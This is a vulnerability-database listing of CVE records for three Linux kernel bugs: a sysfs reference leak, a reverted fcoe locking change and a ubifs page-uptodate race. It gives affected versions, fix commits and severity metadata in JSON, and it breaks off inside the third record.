|---|---|---|---|---|
| Linux | Linux |
Version: 2afc9166f79b8f6da5f347f48515215ceee4ae37 Version: 2afc9166f79b8f6da5f347f48515215ceee4ae37 Version: 2afc9166f79b8f6da5f347f48515215ceee4ae37 Version: 2afc9166f79b8f6da5f347f48515215ceee4ae37 Version: 2afc9166f79b8f6da5f347f48515215ceee4ae37 Version: 2afc9166f79b8f6da5f347f48515215ceee4ae37 Version: 2afc9166f79b8f6da5f347f48515215ceee4ae37 Version: 2afc9166f79b8f6da5f347f48515215ceee4ae37 Version: e8a37b2fd5b5087bec6cbbf6946ee3caa712953b Version: a6abc93760dd07fcd29760b70e6e7520f22cb288 Version: 461a6385e58e8247e6ba2005aa5d1b8d980ee4a2 Version: 8a5e02a0f46ea33ed19e48e096a8e8d28e73d10a Version: c984f4d1d40a2f349503b3faf946502ccbf02f9f Version: 807d1d299a04e9ad9a9dac55419c1137a105254b |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26993",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-01T13:37:12.333218Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-07-05T17:22:44.436Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2025-11-04T17:15:48.314Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f28bba37fe244889b81bb5c508d3f6e5c6e342c5"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/57baab0f376bec8f54b0fe6beb8f77a57c228063"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/84bd4c2ae9c3d0a7d3a5c032ea7efff17af17e17"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/43f00210cb257bcb0387e8caeb4b46375d67f30c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5d43e072285e81b0b63cee7189b3357c7768a43b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ac107356aabc362aaeb77463e814fc067a5d3957"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a4c99b57d43bab45225ba92d574a8683f9edc8e4"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a90bca2228c0646fc29a72689d308e5fe03e6d78"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
},
{
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DAMSOZXJEPUOXW33WZYWCVAY7Z5S7OOY/"
},
{
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4EZ6PJW7VOZ224TD7N4JZNU6KV32ZJ53/"
},
{
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GCBZZEC7L7KTWWAS2NLJK6SO3IZIL4WW/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/sysfs/file.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "f28bba37fe244889b81bb5c508d3f6e5c6e342c5",
"status": "affected",
"version": "2afc9166f79b8f6da5f347f48515215ceee4ae37",
"versionType": "git"
},
{
"lessThan": "57baab0f376bec8f54b0fe6beb8f77a57c228063",
"status": "affected",
"version": "2afc9166f79b8f6da5f347f48515215ceee4ae37",
"versionType": "git"
},
{
"lessThan": "84bd4c2ae9c3d0a7d3a5c032ea7efff17af17e17",
"status": "affected",
"version": "2afc9166f79b8f6da5f347f48515215ceee4ae37",
"versionType": "git"
},
{
"lessThan": "43f00210cb257bcb0387e8caeb4b46375d67f30c",
"status": "affected",
"version": "2afc9166f79b8f6da5f347f48515215ceee4ae37",
"versionType": "git"
},
{
"lessThan": "5d43e072285e81b0b63cee7189b3357c7768a43b",
"status": "affected",
"version": "2afc9166f79b8f6da5f347f48515215ceee4ae37",
"versionType": "git"
},
{
"lessThan": "ac107356aabc362aaeb77463e814fc067a5d3957",
"status": "affected",
"version": "2afc9166f79b8f6da5f347f48515215ceee4ae37",
"versionType": "git"
},
{
"lessThan": "a4c99b57d43bab45225ba92d574a8683f9edc8e4",
"status": "affected",
"version": "2afc9166f79b8f6da5f347f48515215ceee4ae37",
"versionType": "git"
},
{
"lessThan": "a90bca2228c0646fc29a72689d308e5fe03e6d78",
"status": "affected",
"version": "2afc9166f79b8f6da5f347f48515215ceee4ae37",
"versionType": "git"
},
{
"status": "affected",
"version": "e8a37b2fd5b5087bec6cbbf6946ee3caa712953b",
"versionType": "git"
},
{
"status": "affected",
"version": "a6abc93760dd07fcd29760b70e6e7520f22cb288",
"versionType": "git"
},
{
"status": "affected",
"version": "461a6385e58e8247e6ba2005aa5d1b8d980ee4a2",
"versionType": "git"
},
{
"status": "affected",
"version": "8a5e02a0f46ea33ed19e48e096a8e8d28e73d10a",
"versionType": "git"
},
{
"status": "affected",
"version": "c984f4d1d40a2f349503b3faf946502ccbf02f9f",
"versionType": "git"
},
{
"status": "affected",
"version": "807d1d299a04e9ad9a9dac55419c1137a105254b",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/sysfs/file.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.19"
},
{
"lessThan": "4.19",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.313",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.275",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.216",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.157",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.88",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.29",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.8",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.313",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.275",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.216",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.157",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.88",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.29",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.8",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "3.16.62",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "3.18.121",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.4.154",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.9.125",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.14.68",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.18.6",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nfs: sysfs: Fix reference leak in sysfs_break_active_protection()\n\nThe sysfs_break_active_protection() routine has an obvious reference\nleak in its error path. If the call to kernfs_find_and_get() fails then\nkn will be NULL, so the companion sysfs_unbreak_active_protection()\nroutine won\u0027t get called (and would only cause an access violation by\ntrying to dereference kn-\u003eparent if it was called). As a result, the\nreference to kobj acquired at the start of the function will never be\nreleased.\n\nFix the leak by adding an explicit kobject_put() call when kn is NULL."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T12:55:16.847Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/f28bba37fe244889b81bb5c508d3f6e5c6e342c5"
},
{
"url": "https://git.kernel.org/stable/c/57baab0f376bec8f54b0fe6beb8f77a57c228063"
},
{
"url": "https://git.kernel.org/stable/c/84bd4c2ae9c3d0a7d3a5c032ea7efff17af17e17"
},
{
"url": "https://git.kernel.org/stable/c/43f00210cb257bcb0387e8caeb4b46375d67f30c"
},
{
"url": "https://git.kernel.org/stable/c/5d43e072285e81b0b63cee7189b3357c7768a43b"
},
{
"url": "https://git.kernel.org/stable/c/ac107356aabc362aaeb77463e814fc067a5d3957"
},
{
"url": "https://git.kernel.org/stable/c/a4c99b57d43bab45225ba92d574a8683f9edc8e4"
},
{
"url": "https://git.kernel.org/stable/c/a90bca2228c0646fc29a72689d308e5fe03e6d78"
}
],
"title": "fs: sysfs: Fix reference leak in sysfs_break_active_protection()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26993",
"datePublished": "2024-05-01T05:28:02.462Z",
"dateReserved": "2024-02-19T14:20:24.206Z",
"dateUpdated": "2025-11-04T17:15:48.314Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2024-26917 (GCVE-0-2024-26917)
Vulnerability from cvelistv5
Published
2024-04-17 15:59
Modified
2025-05-04 12:55
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
scsi: Revert "scsi: fcoe: Fix potential deadlock on &fip->ctlr_lock"
This reverts commit 1a1975551943f681772720f639ff42fbaa746212.
This commit causes interrupts to be lost for FCoE devices, since it changed
sping locks from "bh" to "irqsave".
Instead, a work queue should be used, and will be addressed in a separate
commit.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 264eae2f523d2aae38188facb4ece893023f25da Version: d2bf25674cea74b865d367d09be5dfe9aff5922a Version: 9cce8ef7a6fa858bbcacd8679a5ca5a4fd3a6df3 Version: 076fb40cf27ab9232d8cce1f007e663e46705302 Version: 5a5fb3b1754fa2b4db95f0151b4af0fb6f8918ec Version: 1a1975551943f681772720f639ff42fbaa746212 Version: 1a1975551943f681772720f639ff42fbaa746212 Version: 1a1975551943f681772720f639ff42fbaa746212 Version: 4ea46b479a00dd232f0dbc81fdc27f9330ecb3ad Version: 694ddc5bf35a5b6f9acb6e4724324c910a1237f1 Version: 6c5d7242bcf2154e9576e5eb2a98c6984ca5ea9a |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:21:05.463Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/94a600226b6d0ef065ee84024b450b566c5a87d6"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2209fc6e3d7727d787dc6ef9baa1e9eae6b1295b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7d4e19f7ff644c5b79e8271df8ac2e549b436a5b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5b8f473c4de95c056c1c767b1ad48c191544f6a5"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6bb22ac1d11d7d20f91e7fd2e657a9e5f6db65e0"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2996c7e97ea7cf4c1838a1b1dbc0885934113783"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/25675159040bffc7992d5163f3f33ba7d0142f21"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/977fe773dcc7098d8eaf4ee6382cb51e13e784cb"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26917",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:47:50.224233Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:32:51.098Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/scsi/fcoe/fcoe_ctlr.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "94a600226b6d0ef065ee84024b450b566c5a87d6",
"status": "affected",
"version": "264eae2f523d2aae38188facb4ece893023f25da",
"versionType": "git"
},
{
"lessThan": "2209fc6e3d7727d787dc6ef9baa1e9eae6b1295b",
"status": "affected",
"version": "d2bf25674cea74b865d367d09be5dfe9aff5922a",
"versionType": "git"
},
{
"lessThan": "7d4e19f7ff644c5b79e8271df8ac2e549b436a5b",
"status": "affected",
"version": "9cce8ef7a6fa858bbcacd8679a5ca5a4fd3a6df3",
"versionType": "git"
},
{
"lessThan": "5b8f473c4de95c056c1c767b1ad48c191544f6a5",
"status": "affected",
"version": "076fb40cf27ab9232d8cce1f007e663e46705302",
"versionType": "git"
},
{
"lessThan": "6bb22ac1d11d7d20f91e7fd2e657a9e5f6db65e0",
"status": "affected",
"version": "5a5fb3b1754fa2b4db95f0151b4af0fb6f8918ec",
"versionType": "git"
},
{
"lessThan": "2996c7e97ea7cf4c1838a1b1dbc0885934113783",
"status": "affected",
"version": "1a1975551943f681772720f639ff42fbaa746212",
"versionType": "git"
},
{
"lessThan": "25675159040bffc7992d5163f3f33ba7d0142f21",
"status": "affected",
"version": "1a1975551943f681772720f639ff42fbaa746212",
"versionType": "git"
},
{
"lessThan": "977fe773dcc7098d8eaf4ee6382cb51e13e784cb",
"status": "affected",
"version": "1a1975551943f681772720f639ff42fbaa746212",
"versionType": "git"
},
{
"status": "affected",
"version": "4ea46b479a00dd232f0dbc81fdc27f9330ecb3ad",
"versionType": "git"
},
{
"status": "affected",
"version": "694ddc5bf35a5b6f9acb6e4724324c910a1237f1",
"versionType": "git"
},
{
"status": "affected",
"version": "6c5d7242bcf2154e9576e5eb2a98c6984ca5ea9a",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/scsi/fcoe/fcoe_ctlr.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.6"
},
{
"lessThan": "6.6",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.307",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.269",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.210",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.149",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.79",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.18",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.6",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.307",
"versionStartIncluding": "4.19.295",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.269",
"versionStartIncluding": "5.4.257",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.210",
"versionStartIncluding": "5.10.195",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.149",
"versionStartIncluding": "5.15.132",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.79",
"versionStartIncluding": "6.1.53",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.18",
"versionStartIncluding": "6.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.6",
"versionStartIncluding": "6.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "6.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.14.326",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "6.4.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "6.5.3",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: Revert \"scsi: fcoe: Fix potential deadlock on \u0026fip-\u003ectlr_lock\"\n\nThis reverts commit 1a1975551943f681772720f639ff42fbaa746212.\n\nThis commit causes interrupts to be lost for FCoE devices, since it changed\nsping locks from \"bh\" to \"irqsave\".\n\nInstead, a work queue should be used, and will be addressed in a separate\ncommit."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T12:55:09.699Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/94a600226b6d0ef065ee84024b450b566c5a87d6"
},
{
"url": "https://git.kernel.org/stable/c/2209fc6e3d7727d787dc6ef9baa1e9eae6b1295b"
},
{
"url": "https://git.kernel.org/stable/c/7d4e19f7ff644c5b79e8271df8ac2e549b436a5b"
},
{
"url": "https://git.kernel.org/stable/c/5b8f473c4de95c056c1c767b1ad48c191544f6a5"
},
{
"url": "https://git.kernel.org/stable/c/6bb22ac1d11d7d20f91e7fd2e657a9e5f6db65e0"
},
{
"url": "https://git.kernel.org/stable/c/2996c7e97ea7cf4c1838a1b1dbc0885934113783"
},
{
"url": "https://git.kernel.org/stable/c/25675159040bffc7992d5163f3f33ba7d0142f21"
},
{
"url": "https://git.kernel.org/stable/c/977fe773dcc7098d8eaf4ee6382cb51e13e784cb"
}
],
"title": "scsi: Revert \"scsi: fcoe: Fix potential deadlock on \u0026fip-\u003ectlr_lock\"",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26917",
"datePublished": "2024-04-17T15:59:26.340Z",
"dateReserved": "2024-02-19T14:20:24.193Z",
"dateUpdated": "2025-05-04T12:55:09.699Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-35821 (GCVE-0-2024-35821)
Vulnerability from cvelistv5
Published
2024-05-17 13:23
Modified
2025-05-04 09:06
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
ubifs: Set page uptodate in the correct place
Page cache reads are lockless, so setting the freshly allocated page
uptodate before we've overwritten it with the data it's supposed to have
in it will allow a simultaneous reader to see old data. Move the call
to SetPageUptodate into ubifs_write_end(), which is after we copied the
new data into the page.
References
| URL | Tags | ||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1e51764a3c2ac05a23a22b2a95ddee4d9bffb16d Version: 1e51764a3c2ac05a23a22b2a95ddee4d9bffb16d Version: 1e51764a3c2ac05a23a22b2a95ddee4d9bffb16d Version: 1e51764a3c2ac05a23a22b2a95ddee4d9bffb16d Version: 1e51764a3c2ac05a23a22b2a95ddee4d9bffb16d Version: 1e51764a3c2ac05a23a22b2a95ddee4d9bffb16d Version: 1e51764a3c2ac05a23a22b2a95ddee4d9bffb16d Version: 1e51764a3c2ac05a23a22b2a95ddee4d9bffb16d Version: 1e51764a3c2ac05a23a22b2a95ddee4d9bffb16d |
||
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "4aa554832b9d",
"status": "affected",
"version": "1e51764a3c2a",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "778c6ad40256",
"status": "affected",
"version": "1e51764a3c2a",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "8f599ab6fabb",
"status": "affected",
"version": "1e51764a3c2a",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "f19b1023a375",
"status": "affected",
"version": "1e51764a3c2a",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "142d87c958d9",
"status": "affected",
"version": "1e51764a3c2a",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "fc99f4e2d2f1",
"status": "affected",
"version": "1e51764a3c2a",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "4b7c4fc60d6a",
"status": "affected",
"version": "1e51764a3c2a",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "17772bbe9cfa",
"status": "affected",
"version": "1e51764a3c2a",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "723012cab779",
"status": "affected",
"version": "1e51764a3c2a",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"status": "affected",
"version": "2.6.27"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "2.6.27",
"status": "unaffected",
"version": "0",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.312",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.274",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.215",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.154",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.84",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.24",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.12",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.3",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"status": "unaffected",
"version": "6.9"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
